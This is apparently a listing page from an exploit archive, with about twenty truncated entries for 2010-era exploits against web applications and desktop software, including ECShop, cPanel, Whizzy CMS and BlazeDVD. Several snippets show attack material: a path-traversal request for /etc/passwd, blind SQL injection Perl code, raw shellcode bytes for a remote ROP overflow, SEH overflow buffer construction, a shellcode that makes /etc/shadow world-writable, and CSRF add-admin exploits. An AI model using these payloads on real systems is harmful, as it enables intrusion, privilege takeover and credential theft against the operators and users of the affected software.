Impact Software AdPeeps - Cross-Site Scripting / HTML Injection
source: https://www.securityfocus.com/bid/42071/info Impact Software Ad Peeps is prone to multiple cross-site scripting vulnerabilities and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content...
ECShop 2.5.x & 2.6.x injection exploit
ECShop 2.5.x & 2.6.x: goodsscript.php does not initialize the SQL statement, leading to injection vulnerabilities. Affects 2.5.x and 2.6.x; other versions not tested. goodsscript.php, line 44: injection / admin credentials disclosure exploit if emptyempty$GET'type' ... elseif $GET'type' == 'collection' ... $sql .=...
Freelancers Marketplace Script - Persistent Cross-Site Scripting
Freelancers Marketplace Script - Persistent Cross-Site Scripting Name : Freelancers Marketplace Script Persistent XSS Vulnerability Date : July 17, 2010 Critical Level : HIGH vendor URL : http://www.guruscript.com/ google dork: Powered by Guruscript.com Author : Sid3^effects aKa HaRi special thanks ...
Cross-site Scripting (XSS) Vulnerabilities in Campsite
High-Tech Bridge SA Security Research Lab has discovered two vulnerabilities in Campsite which could be exploited to perform cross-site scripting attacks. 1 Cross-site scripting XSS vulnerabilities in Campsite 1.1 The vulnerability exists due to input sanitation error in the "fcommentsearch"...
Whizzy CMS 10.01 - Local File Inclusion
Whizzy CMS 10.01 - Local File Inclusion x Type: Local File Inclusion x Vendor: Unverse.net x Script Name: Whizzy CMS x Script version: 10.01 x Author: Anarchy Angel x Mail : anarchydotang31@gmaildotcom Exploit: http://site.org/?LFI Ex: http://site.org/?../../../../../../../etc/passwd Special Tnx ...
ASX To MP3 Converter 3.1.2.1 SEH Exploit
Exploit Title: ASX to MP3 Converter v3.1.2.1 SEH Exploit Multiple OS, DEP and ASLR Bypass Date: July 13, 2010 Author: Node Software Link: http://www.mini-stream.net/downloads/ASXtoMP3Converter.exe Version: Mini-Stream Software ASX to MP3 Converter v3.1.2.1.2010.03.30 Evaluation Tested on: Windows...
Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Overflow
!/usr/bin/python EvoCam Web Server OSX 3.6.6 and 3.6.7 import socket import struct SHELL = "\xdb\xd2\x29\xc9\xb1\x27\xbf\xb1\xd5\xb6\xd3\xd9\x74\x24" "\xf4\x5a\x83\xea\xfc\x31\x7a\x14\x03\x7a\xa5\x37\x43\xe2" "\x05\x2e\xfc\x45\xd5\x11\xad\x17\x65\xf0\x80\x18\x8a\x71"...
Family Connections Who is Chatting AddOn - Remote File Inclusion
Family Connections Who is Chatting AddOn - Remote File Inclusion ======================================================= Who is Chatting 2.2.3 Remote File Include Vulnerability ======================================================= Author : lumut-- Script Details :...
cPanel 11.25 - Cross-Site Request Forgery (Add FTP Account)
Exploit Title: Cpanel 11.25 - CSRF Add FTP Account Author: G0D-F4Th3r Software Link: http://www.cpanel.net/ Version: 11.25 Exploit Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends...
ShopCartDx 4.30 Remote Blind SQL Injection Exploit
!/usr/bin/perl 0-Day ShopCartDx newGET = $Host; my $HTTP = new LWP::UserAgent; my $Referrer = "http://www.warwolfz.org/"; my $DefaultTime = request$Referrer; sub BlindSQLJnjection my $dec,$hex = @; return "./products.php?cid=-1 OR 1!=SELECT...
Gekko CMS (SQL Injection) Vulnerability
No description provided by source. 2-SQL injection Vulnerability Description: SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for strin...
linux/ARM chmod("/etc/shadow", 0777) Shellcode 35 Bytes
Exploit for linux/x86 platform in category shellcode ======================================================= linux/ARM chmod"/etc/shadow", 0777 Shellcode 35 Bytes ======================================================= / | Title: Linux/ARM chmod"/etc/shadow", 0777 Shellcode 35 Bytes | Type:...
Allomani Super Multimedia 2.5 Cross Site Request Forgery
Exploit Title: Allomani - Super Multimedia v2.5 - CSRF Add Admin Account Date: 29-06-2010 Author: G0D-F4Th3r Software Link: http://demos.allomani.com/media250/ Version: 2.5 Tested on: http://demos.allomani.com/media250/ Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My...
Vodu CMS (XSS/URL Redirecting) Multiple Vulnerability
Exploit for php platform in category web applications ===================================================== Vodu CMS XSS/URL Redirecting Multiple Vulnerability ===================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' ...
Ceica-GW - 'login.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/40917/info Ceica-GW is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of t...
Bilder Upload Script Datei Upload 1.09 - Arbitrary File Upload
InformatioN Homepage: http://www.joomlaservice.info Or http://www.dz4all.com Vendor : http://www.php-space.info/bilder-upload-script/ Download: http://www.php-space.info/bilder-upload-script/bilder-upload-script1.09.rar Email : [email protected] Dork : allinurl: In YoUr Dream Lamerz exploit :...
Allomani And Clips 2.7.0 Cross Site Request Forgery
Exploit Title: Allomani & Clips v2.7.0 - CSRF Add Admin Account Date: 25-06-2010 Author: G0D-F4Th3r Software Link: http://demos.allomani.com/songs270/ Version: 2.7.0 Tested on: http://demos.allomani.com/songs270/ Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends...
Big Forum SQL injection Vulnerability
No description provided by source. =================Exploit================== EXPL0!T http://server/path/forum.php?id=3SQL =========================================================== Greetz to : Alnjm33-virus-pal -g3n1ux - Predator-Ahmadso - xXx-jago-dz -inejcteur-4PY-SaYrOs- XR57 -Tr0y-x -alsaek...
Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin)
Exploit Title: Allomani & Clips v2.7.0 - CSRF Add Admin Account Date: 25-06-2010 Author: G0D-F4Th3r Software Link: http://allomani.com Greetz to : AL-MoGrM - dEvIL NeT - Bad hacker - v4-team members - And All My Friends...
BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)
Exploit Title : BlazeDVD v6 .plf SEH universale Buffer Overflow tested on windows xp SP 3 FR Author: MadjiX Dz8 HotmaiL cOm Greets:Bibi-info , His0k4 where are you : my $file= "MadjiX.plf"; my $junk="\x41" x 608; my $nseh="\xeb\x06\x90\x90"; my $seh= pack'V',0x100157F5; my $nops="\x90" x 24; calc...